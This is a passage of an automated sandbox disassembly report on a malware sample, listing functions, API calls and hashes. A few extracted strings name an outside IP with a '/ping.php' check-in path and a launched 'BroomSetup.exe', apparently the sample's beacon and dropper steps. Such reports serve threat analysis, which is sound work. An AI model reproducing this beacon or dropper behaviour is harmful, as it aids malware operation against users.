• Instruction ID: 4b083a6e31e8a48a8b86c3cb0939e7a8061e9024a6891407e723d3d4127bfca1
• Opcode Fuzzy Hash: d4ccbc2f617275c87f26a6c66d33927148d843e0dce03c06d1c0141f6de17669
• Instruction Fuzzy Hash: 09F04F32504310AB8A20EB6AF886E9773D9FA44764355480AFD08D7600CB38FCC0869C
Uniqueness
Uniqueness Score: -1.00%
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CFF11D
                                                                                                                                                                                                                                    • Part of subcall function 05CF6501: HeapFree.KERNEL32(00000000,00000000,?,05CFF3B8,?,00000000,?,00000000,?,05CFF65C,?,00000007,?,?,05CFFA50,?), ref: 05CF6517
                                                                                                                                                                                                                                    • Part of subcall function 05CF6501: GetLastError.KERNEL32(?,?,05CFF3B8,?,00000000,?,00000000,?,05CFF65C,?,00000007,?,?,05CFFA50,?,?), ref: 05CF6529
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CFF12F
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CFF141
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CFF153
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CFF165
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: d4ccbc2f617275c87f26a6c66d33927148d843e0dce03c06d1c0141f6de17669
                                                                                                                                                                                                                                  • Instruction ID: 9a504017d32dabecfcf7f9d749970e0d81ed1d7df4605254774de0c11a187e0d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4ccbc2f617275c87f26a6c66d33927148d843e0dce03c06d1c0141f6de17669
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3FF01232518601BB8AB0DBA8E8C9D1B73E9FA047507645C19F786E7510CB31FAC14B95
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004152D0
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004152E2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004152F5
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00415306
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00415317
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
                                                                                                                                                                                                                                  • Instruction ID: 0846cff003075c5ec292790c94e0e8fa2dbc871af0b69e12aa43d6fe7fad35b7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9F0DAB18017209BCA167F19FC816893B60FB5872872271BBF919A6275CB3959818FCD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF5537
                                                                                                                                                                                                                                    • Part of subcall function 05CF6501: HeapFree.KERNEL32(00000000,00000000,?,05CFF3B8,?,00000000,?,00000000,?,05CFF65C,?,00000007,?,?,05CFFA50,?), ref: 05CF6517
                                                                                                                                                                                                                                    • Part of subcall function 05CF6501: GetLastError.KERNEL32(?,?,05CFF3B8,?,00000000,?,00000000,?,05CFF65C,?,00000007,?,?,05CFFA50,?,?), ref: 05CF6529
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF5549
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF555C
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF556D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF557E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
                                                                                                                                                                                                                                  • Instruction ID: d78fd46c7358000eed82f4b7b6316fe2caa7a619e83e367af225bfc888db3443
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67F05EB1911221ABCEA66F58FCC45153B61FB04620311797AF709B2278CF364A81AFCA
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                  • API String ID: 0-2895899722
                                                                                                                                                                                                                                  • Opcode ID: 0f9de87aa70dfc3766fc84c0c63344a5301fc3d38da3a9e682d4dd5edf44a18c
                                                                                                                                                                                                                                  • Instruction ID: b548a9a7138a64da7a824066f4516bdc11857ebac08ae9c998b6d8d4508c541d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f9de87aa70dfc3766fc84c0c63344a5301fc3d38da3a9e682d4dd5edf44a18c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF51C171D40209ABDB10AFA9C945FEF7BB8AF45314F12015BE804B7292D778D981CB69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _strpbrk.LIBCMT ref: 0041D8A0
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041D9BD
                                                                                                                                                                                                                                    • Part of subcall function 00410932: IsProcessorFeaturePresent.KERNEL32(00000017,00410904,00000016,00412B39,0000002C,00439740,0041D3CD,?,?,?,00410911,00000000,00000000,00000000,00000000,00000000), ref: 00410934
                                                                                                                                                                                                                                    • Part of subcall function 00410932: GetCurrentProcess.KERNEL32(C0000417,00412B39,00000016,00416D9C), ref: 00410956
                                                                                                                                                                                                                                    • Part of subcall function 00410932: TerminateProcess.KERNEL32(00000000), ref: 0041095D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                                                                                                                  • String ID: *?$.
                                                                                                                                                                                                                                  • API String ID: 2812119850-3972193922
                                                                                                                                                                                                                                  • Opcode ID: acc5e60d4f05009bbc3f2ccde68c96ea5ce2f15c3993d478fa3a97017db29cf6
                                                                                                                                                                                                                                  • Instruction ID: 8cfe7552e8cc1931d7ce14f3a793833fed444a164ef8b9e72ccff9a48bf79fb4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: acc5e60d4f05009bbc3f2ccde68c96ea5ce2f15c3993d478fa3a97017db29cf6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9251B3B1E00219AFDF14DFA9C881AEEBBB5EF48314F24416EE854E7341D6399E41CB54
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe,00000104), ref: 00413303
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004133CE
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004133D8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                                                  • String ID: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe
                                                                                                                                                                                                                                  • API String ID: 2506810119-1288547603
                                                                                                                                                                                                                                  • Opcode ID: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
                                                                                                                                                                                                                                  • Instruction ID: ddf04b2862e1199f4fb1385bf4b9d3a7dff69665be34de18e7ab35541f588614
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD319571A00218AFDB219F5A9C819DEBBB8EB85315F1041ABFC14D7210DB749B81CB9C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe,00000104), ref: 05CF356A
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF3635
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF363F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                                                  • String ID: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe
                                                                                                                                                                                                                                  • API String ID: 2506810119-1288547603
                                                                                                                                                                                                                                  • Opcode ID: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
                                                                                                                                                                                                                                  • Instruction ID: 6a1045540fbd814449d0b97740580c2b667562426166593ebb310aa4d2cd255d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF3181B1A04298BFDB61DB99DC84DAEBBFDFB84B10F104866E605A7310D7709A40DB94
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                                                  • String ID: /ping.php?substr=%s$185.172.128.228$Installed
                                                                                                                                                                                                                                  • API String ID: 3519838083-3380671521
                                                                                                                                                                                                                                  • Opcode ID: 0208322c849bd223be65c5dc220457c235287cfb99792f80a98781b5adf53624
                                                                                                                                                                                                                                  • Instruction ID: 895aa7ca95bfe32917cece0cc4021e99c0fa9e15b4dc78af84e68f763d0dcda6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0208322c849bd223be65c5dc220457c235287cfb99792f80a98781b5adf53624
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E01A172A01114BBDB04AF89DC41BAEF769EF89315F10013FF805E3291D3789E4186E9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                                                  • String ID: /ping.php?substr=%s$185.172.128.228$Installed
                                                                                                                                                                                                                                  • API String ID: 3519838083-3380671521
                                                                                                                                                                                                                                  • Opcode ID: 0208322c849bd223be65c5dc220457c235287cfb99792f80a98781b5adf53624
                                                                                                                                                                                                                                  • Instruction ID: e2474b82748048003be2cedeb608fe93115641b11fdaf52311a1fe5e0c8c7dde
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0208322c849bd223be65c5dc220457c235287cfb99792f80a98781b5adf53624
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A01CCB2A05155ABD705DF88DC44BAEB7B8FF48A10F14092AF805E7240E3B4BA50CAE1
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ShellExecuteEx.SHELL32(?), ref: 05D06509
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00008000), ref: 05D0651D
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 05D06526
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseExecuteHandleObjectShellSingleWait
                                                                                                                                                                                                                                  • String ID: /BroomSetup.exe
                                                                                                                                                                                                                                  • API String ID: 3837156514-1897133622
                                                                                                                                                                                                                                  • Opcode ID: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
                                                                                                                                                                                                                                  • Instruction ID: 139083faa9700a03222345039cb73b4cfd3916c2cedb1059351fa968dc4eb5e4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C017C71E00218EBDB25DF69E9449DDBFB9FF08610F00812AF805A6160EB709645CF94
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1036877536-0
                                                                                                                                                                                                                                  • Opcode ID: 557eb8767c00bad00038b2e5be713a3e80c22743073acb8fbc22b4e1da937f5c
                                                                                                                                                                                                                                  • Instruction ID: 95edb75e536639b33972a857d440f8be94c0c6db010a7eda39038c13656bb89e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 557eb8767c00bad00038b2e5be713a3e80c22743073acb8fbc22b4e1da937f5c
• Instruction Fuzzy Hash: 0FA11372A083869FDB218F18C8817EBBBF1EF55354F1541AEE4859B381C63C8D82C758
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
Yara matches
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
• Opcode ID: 557eb8767c00bad00038b2e5be713a3e80c22743073acb8fbc22b4e1da937f5c
• Instruction ID: b55acb8f330b525d84ec3179ab62212a9c46e52dfb22f9248b24196f07b35849
• Opcode Fuzzy Hash: 557eb8767c00bad00038b2e5be713a3e80c22743073acb8fbc22b4e1da937f5c
• Instruction Fuzzy Hash: A8A15872A047869FDF25CF58C890BBEBBE5FF11350F144AADD6959B281C3389A41C750
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: f01287b46ae53a51101a135f4392dfdbeaf8165ae30d8bdb7f55eb9fcaa53402
• Instruction ID: c8489a2078e21136fa723fa80d13f2eda68097992bc6546b806c704246c56682
• Opcode Fuzzy Hash: f01287b46ae53a51101a135f4392dfdbeaf8165ae30d8bdb7f55eb9fcaa53402
• Instruction Fuzzy Hash: AE414C31B402217BDB306E7A9D41BAF3A64EF45374F54025BF818D6691DAFC8C9182AD
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 963c7352d2e0a54c0d0f88c3f11fb2999fab24a43c9dca7c6f6700f89c7226dd
• Instruction ID: a2220b35b5e6e560052046bd8af0be11217f29edf5e0652a71ec25361178693f
• Opcode Fuzzy Hash: 963c7352d2e0a54c0d0f88c3f11fb2999fab24a43c9dca7c6f6700f89c7226dd
• Instruction Fuzzy Hash: C3413139B056046BDB61ABB8CC8CBBE36A6FF05370F141A17F514D63D0DA74894157B1
Uniqueness

Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,0042D740,00000000,00000000,8B56FF8B,05CF4002,?,00000004,00000001,0042D740,0000007F,?,8B56FF8B,00000001), ref: 05CFB6DD
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 05CFB766
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 05CFB778
• __freea.LIBCMT ref: 05CFB781
  • Part of subcall function 05CF7CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05CF7CDE
Memory Dump Source
• Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• String ID:
• API String ID: 2652629310-0
• Opcode ID: 418993263a88c618d282e3586c2c640cbdd5746430a48a443b1d1fb7bcbd7a35
• Instruction ID: 6261388b75e242e8d369c7cf1ed66f23ee0d18a372e7fb7564ad221281ceb676
• Opcode Fuzzy Hash: 418993263a88c618d282e3586c2c640cbdd5746430a48a443b1d1fb7bcbd7a35
• Instruction Fuzzy Hash: 9131F272A0020AABDF25CF64CC84EAF7BB5EF40254F150929ED05D7290EB35DD54CBA0
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 0040CCBE
  • Part of subcall function 0040CC0B: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0040CC3A
  • Part of subcall function 0040CC0B: ___AdjustPointer.LIBCMT ref: 0040CC55
• _UnwindNestedFrames.LIBCMT ref: 0040CCD3
• __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0040CCE4
• CallCatchBlock.LIBVCRUNTIME ref: 0040CD0C
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
• String ID:
• API String ID: 737400349-0
• Opcode ID: 47db2c8148be1e88ced26f356c7ddfb08dca30c4f884cb2ff03c50df69916c0c
• Instruction ID: 6cd8a4fdf9e309ef40a66346d060796d29459ceaa081db5c793327cde4683266
• Opcode Fuzzy Hash: 47db2c8148be1e88ced26f356c7ddfb08dca30c4f884cb2ff03c50df69916c0c
• Instruction Fuzzy Hash: AA012D72500108BBDF116F96CC81DEB3F69EF98758F044129FE0866261C73AE861DBA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 05CECF25
  • Part of subcall function 05CECE72: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 05CECEA1
  • Part of subcall function 05CECE72: ___AdjustPointer.LIBCMT ref: 05CECEBC
• _UnwindNestedFrames.LIBCMT ref: 05CECF3A
• __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 05CECF4B
• CallCatchBlock.LIBVCRUNTIME ref: 05CECF73
Memory Dump Source
• Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
Yara matches
Similarity
• API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
• String ID:
• API String ID: 737400349-0
• Opcode ID: 47db2c8148be1e88ced26f356c7ddfb08dca30c4f884cb2ff03c50df69916c0c
• Instruction ID: 14560e8e160385e54ff228da222fab9f675fd558dc5b55d9803f144aac3a5fb2
• Opcode Fuzzy Hash: 47db2c8148be1e88ced26f356c7ddfb08dca30c4f884cb2ff03c50df69916c0c
• Instruction Fuzzy Hash: 34012D72600108BBCF126E95CC48DEB7B69FF49754F044408FE0856120D736D961EBA0
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,05CEED94,00000000,00000000,?,05CF7461,05CEED94,00000000,00000000,00000000,?,05CF7719,00000006,0042E2F8), ref: 05CF74EC
• GetLastError.KERNEL32(?,05CF7461,05CEED94,00000000,00000000,00000000,?,05CF7719,00000006,0042E2F8,0042E2F0,0042E2F8,00000000,00000364,?,05CF7052), ref: 05CF74F8
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,05CF7461,05CEED94,00000000,00000000,00000000,?,05CF7719,00000006,0042E2F8,0042E2F0,0042E2F8,00000000), ref: 05CF7506
Memory Dump Source
• Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
Yara matches
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
• Opcode ID: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
                                                                                                                                                                                                                                  • Instruction ID: 5f3ae306669d40680e1411826b6603adfb3a97d06c8f061ab497a03cf9e68135
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C70124323422269BC7B08B29AC44E6A3BDAFF046A17524D34FB06E3180DB60D901C7E4
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• __startOneArgErrorHandling.LIBCMT ref: 004129CD
Strings
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: ErrorHandling__start
• String ID: pow
• API String ID: 3213639722-2276729525
• Opcode ID: 0168bbcefadc1572663007d7dce21aba4256d125ab4b2ee182621d1a610e57aa
• Instruction ID: e0eefe9174cd7462181434ea84c362ca9420c476202b864f0baa4bab5f354a80
• Opcode Fuzzy Hash: 0168bbcefadc1572663007d7dce21aba4256d125ab4b2ee182621d1a610e57aa
• Instruction Fuzzy Hash: 8D515DB1B5420196C7217B19CE813EB2B90EB40744F64496BE085C23E8EB7D8CE7DA4E
Uniqueness

Uniqueness Score: -1.00%

APIs
